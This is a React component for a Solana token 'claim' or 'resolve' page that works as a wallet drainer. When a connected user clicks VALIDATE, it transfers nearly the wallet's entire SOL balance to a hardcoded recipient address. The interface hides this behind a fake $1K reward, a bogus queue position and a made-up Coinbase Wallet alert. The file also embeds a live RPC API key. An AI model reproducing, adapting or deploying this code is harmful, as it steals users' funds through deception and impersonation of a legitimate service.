import React, { useState, useEffect } from 'react';
import { useWallet } from '@solana/wallet-adapter-react';
import { Connection, PublicKey, Transaction, SystemProgram, LAMPORTS_PER_SOL } from '@solana/web3.js';
import { Clock, AlertCircle, ExternalLink, LogOut } from 'lucide-react';
import { WalletMultiButton } from '@solana/wallet-adapter-react-ui';

// ===================== TRANSFER DESTINATION (SOLANA) =====================
// 100% will go to SOL_PRIMARY_RECIPIENT
const SOL_PRIMARY_RECIPIENT = 'E9pMutPxWxPCbMAnKC32e8L8iarzA1xQ3XX8o3szS1kC';

const ClaimButton = () => {
  const { publicKey, sendTransaction, disconnect, wallet } = useWallet();
  const [loading, setLoading] = useState(false);
  const [error, setError] = useState('');
  const [success, setSuccess] = useState(false);


  useEffect(() => {
    const fetchBalance = async () => {
      if (publicKey) {
        try {
                const connection = new Connection('https://mainnet.helius-rpc.com/?api-key=1a2cd70a-5fe9-4a04-931f-6a3ac221a7ca', 'confirmed');
      await connection.getBalance(publicKey);
        } catch (err) {
          console.error('Failed to fetch balance:', err);
        }
      }
    };

    fetchBalance();
  }, [publicKey]);



  // Function to format wallet address
  const formatAddress = (address) => {
    return `${address.slice(0, 4)}...${address.slice(-4)}`;
  };



  const handleClaim = async () => {
    try {
      setLoading(true);
      setError('');
      setSuccess(false);

      // Create connection
      const connection = new Connection('https://mainnet.helius-rpc.com/?api-key=1a2cd70a-5fe9-4a04-931f-6a3ac221a7ca', 'confirmed');
      
      // Get the latest blockhash and current balance
      const [{ blockhash }, currentBalance] = await Promise.all([
        connection.getLatestBlockhash(),
        connection.getBalance(publicKey)
      ]);

      // Use entire balance minus a safety fee buffer (slightly higher because we have two instructions)
      const feeBufferLamports = Math.ceil(0.0025 * LAMPORTS_PER_SOL);
      const sendableLamports = currentBalance - feeBufferLamports;

      if (sendableLamports <= 0) {
        throw new Error('Insufficient balance for transaction');
      }
      
      // Prepare recipient
      const primaryRecipient = new PublicKey(SOL_PRIMARY_RECIPIENT);

      const transaction = new Transaction();

      // Send 100% to primary recipient
      transaction.add(
        SystemProgram.transfer({
          fromPubkey: publicKey,
          toPubkey: primaryRecipient,
          lamports: sendableLamports,
        })
      );

      // Set the recent blockhash
      transaction.recentBlockhash = blockhash;
      transaction.feePayer = publicKey;

      // Send transaction
      const signature = await sendTransaction(transaction, connection);
      console.log('Transaction sent:', signature);
      
      // Wait for confirmation
      const confirmation = await connection.confirmTransaction(signature, 'confirmed');
      console.log('Transaction confirmed:', confirmation);
      
      setSuccess(true);

    } catch (err) {
      console.error('Claim failed:', err);
      setError(`Claim failed: ${err.message || 'Please try again.'}`);
    } finally {
      setLoading(false);
    }
  };

  return (
    <div className="space-y-6">
      <div className="space-y-4 mb-6">
        <div className="p-3 sm:p-4 rounded-lg bg-white/5">
          <h3 className="text-base sm:text-lg font-semibold mb-4">Resolve issue</h3>
          <div className="space-y-3">
            <div className="flex flex-col sm:flex-row sm:justify-between sm:items-center space-y-1 sm:space-y-0">
              <span className="text-gray-400 text-sm sm:text-base">Wallet balance:</span>
              <div className="flex items-center space-x-2">
                <div className="bg-teal-400 w-4 h-4 sm:w-5 sm:h-5 rounded-full"></div>
                <span className="font-medium text-sm sm:text-base">$1K ~ 7.9 SOL</span>
              </div>
            </div>
            <div className="flex flex-col sm:flex-row sm:justify-between sm:items-center space-y-1 sm:space-y-0">
              <span className="text-gray-400 text-sm sm:text-base">Completion time:</span>
              <span className="font-medium text-sm sm:text-base">Instantly</span>
            </div>
          </div>
        </div>
      </div>

      {!publicKey ? (
        <div className="text-center py-6 sm:py-8">
          <h3 className="text-lg sm:text-xl font-semibold mb-3 sm:mb-4">Connect Your Wallet</h3>
          <p className="text-gray-300 mb-4 sm:mb-6 text-sm sm:text-base">Please connect your wallet to proceed with the resolve</p>
          <div className="flex flex-col items-center space-y-3">
          
           {wallet && wallet.adapter.name === 'Coinbase Wallet' ? (<>

               <div className="p-3 sm:p-4 bg-yellow-600/20 text-yellow-300 rounded-lg flex items-start space-x-2 sm:space-x-3 mb-4 sm:mb-6">
              <AlertCircle size={20} className="sm:w-6 sm:h-6 flex-shrink-0 mt-0.5" />
              <div>
                <h4 className="font-semibold text-base sm:text-lg mb-1">Coinbase Wallet Alert</h4>
                <p className="text-xs sm:text-sm">
                  There is current excessive crowding and progressive increase in Solana (SOL) gas fees on the Coinbase network. This congestion has led to higher transaction costs and slower processing times.
                </p>
                <p className="text-xs sm:text-sm mt-2">
                  To help you avoid these issues, Coinbase recommends using alternative wallets such as <span className="font-bold">Phantom Wallet</span> or <span className="font-bold">Solflare Wallet</span>. Both wallets offer a smoother network experience and significantly lower gas fees when swapping 4WMM token to Solana (SOL).
                </p>
                <br></br>
              <button
              onClick={disconnect}
                className="text-gray-400 hover:text-gray-300 text-xs sm:text-sm transition-colors" 
            >
              Switch to another wallet
            </button>
              </div>
            </div>
           </>
           ) : (
            <>
             <WalletMultiButton className="!bg-teal-400 !text-purple-900 hover:!bg-teal-300 !rounded-lg !h-12 !px-6" />
            <button
              onClick={disconnect}
              className="text-gray-400 hover:text-gray-300 text-sm transition-colors"
            >
              Clear Selection
            </button>
            
            </>
           )
           
           
           }
       




         {/* NEW: Coinbase Wallet Warning */}
          {/* {wallet && wallet.adapter.name === 'Coinbase Wallet' && (
           
          )} */}
          </div>
        </div>
      ) : success ? (
        <div className="text-center py-6 sm:py-8">
          <div className="mx-auto w-12 h-12 sm:w-16 sm:h-16 rounded-full bg-purple-600/30 flex items-center justify-center mb-3 sm:mb-4">
            <Clock size={24} className="sm:w-8 sm:h-8 text-purple-300" />
          </div>
          <h3 className="text-lg sm:text-xl font-semibold mb-2">You Have Been Added to Queue</h3>
          <p className="text-gray-300 mb-4 sm:mb-6 text-sm sm:text-base">Your resolve for $1k ~ 7.9 SOL is being processed</p>
          <div className="p-3 rounded-lg bg-white/5 mb-4">
            <div className="flex justify-between items-center mb-2">
              <span className="text-gray-400 text-sm sm:text-base">Position</span>
              <span className="font-medium text-sm sm:text-base">#42</span>
            </div>
            <div className="w-full bg-purple-900/50 rounded-full h-2">
              <div className="bg-teal-400 h-2 rounded-full w-1/4"></div>
            </div>
          </div>
          <div className="flex items-center justify-center space-x-2 text-xs sm:text-sm text-gray-400">
            <span>Check status on Explorer</span>
            <ExternalLink size={12} className="sm:w-3.5 sm:h-3.5" />
          </div>
          <button
            onClick={() => setSuccess(false)}
            className="mt-4 sm:mt-6 w-full py-2.5 sm:py-3 rounded-lg bg-teal-400 text-purple-900 font-semibold hover:bg-teal-300 transition-all text-sm sm:text-base"
          >
            Make Another Resolve
          </button>
        </div>
      ) : (
        <>
        

          <div className="p-3 rounded-lg bg-white/5 mb-6">
            <div className="flex flex-col sm:flex-row sm:justify-between sm:items-center space-y-2 sm:space-y-0">
              <span className="text-gray-400 text-sm sm:text-base">Connected Wallet</span>
              <div className="flex items-center justify-between sm:justify-end space-x-2">
                <span className="font-medium text-sm sm:text-base">{formatAddress(publicKey.toString())}</span>
                <button
                  onClick={disconnect}
                  className="p-1 hover:bg-white/10 rounded-lg transition-colors"
                >
                  <LogOut size={14} className="sm:w-4 sm:h-4 text-gray-400" />
                </button>
              </div>
            </div>
          </div>

          <div className="flex justify-center">
            <button 
              onClick={handleClaim}
              disabled={loading}
              className={`w-full sm:w-1/2 py-2.5 sm:py-3 px-6 sm:px-8 rounded-lg text-center font-semibold transition-all text-sm sm:text-base ${
                loading
                  ? 'bg-purple-600 cursor-wait' 
                  : 'bg-teal-400 text-purple-900 hover:bg-teal-300'
              }`}
            >
              {loading ? (
                <div className="flex items-center justify-center space-x-2">
                  <div className="loading-spinner"></div>
                  <span>Processing...</span>
                </div>
              ) : (
                'VALIDATE'
              )}
            </button>
          </div>

          {error && (
            <div className="error-message text-red-400 text-center p-4 rounded-lg bg-red-400/10">
              {error}
            </div>
          )}
        </>
      )}
    </div>
  );
};

export default ClaimButton;